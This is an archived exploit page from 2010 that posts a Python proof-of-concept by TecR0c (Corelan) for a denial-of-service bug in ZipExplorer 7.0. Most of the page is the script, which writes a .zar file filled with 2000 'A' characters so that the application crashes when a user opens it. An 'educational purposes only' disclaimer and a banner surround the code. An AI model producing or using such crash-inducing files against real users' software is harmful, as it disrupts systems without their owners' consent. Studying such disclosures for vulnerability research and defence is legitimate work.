Home / os / win7

ZipExplorer 7.0 (.zar) DoS

Posted on 31 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>ZipExplorer 7.0 (.zar) DoS</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>========================== ZipExplorer 7.0 (.zar) DoS ========================== #!/usr/bin/python # # Title: ZipExplorer 7.0 (.zar) DoS # Advisory: http://www.corelan.be:8800/advisories.php?id=10-045 # Author: TecR0c - http://tecninja.net/blog # Found by: TecR0c - http://twitter.com/TecR0c # Date: June 1st, 2010 # Download: http://home.online.no/~arnholm/org/exe/ZipX70sh.exe # Platform: Windows XP sp3 En # Greetz to: Corelan Security Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/ # # Script provided 'as is', without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. # Usage: Launch Application &gt; Open &gt; Navigate to file &gt; Double click &gt; BOOM print &quot;|------------------------------------------------------------------|&quot; print &quot;| __ __ |&quot; print &quot;| _________ ________ / /___ _____ / /____ ____ _____ ___ |&quot; print &quot;| / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__ |&quot; print &quot;| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |&quot; print &quot;| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |&quot; print &quot;| |&quot; print &quot;| http://www.corelan.be:8800 |&quot; print &quot;| security@corelan.be |&quot; print &quot;| |&quot; print &quot;|-------------------------------------------------[ EIP Hunters ]--|&quot; print &quot;[+] ZipExplorer 7.0 (.zar) DoS - by TecR0c&quot; dos = &quot;x41&quot; * 2000 mefile = open('tecr0c.zar','w'); mefile.write(dos); mefile.close() # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-31]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP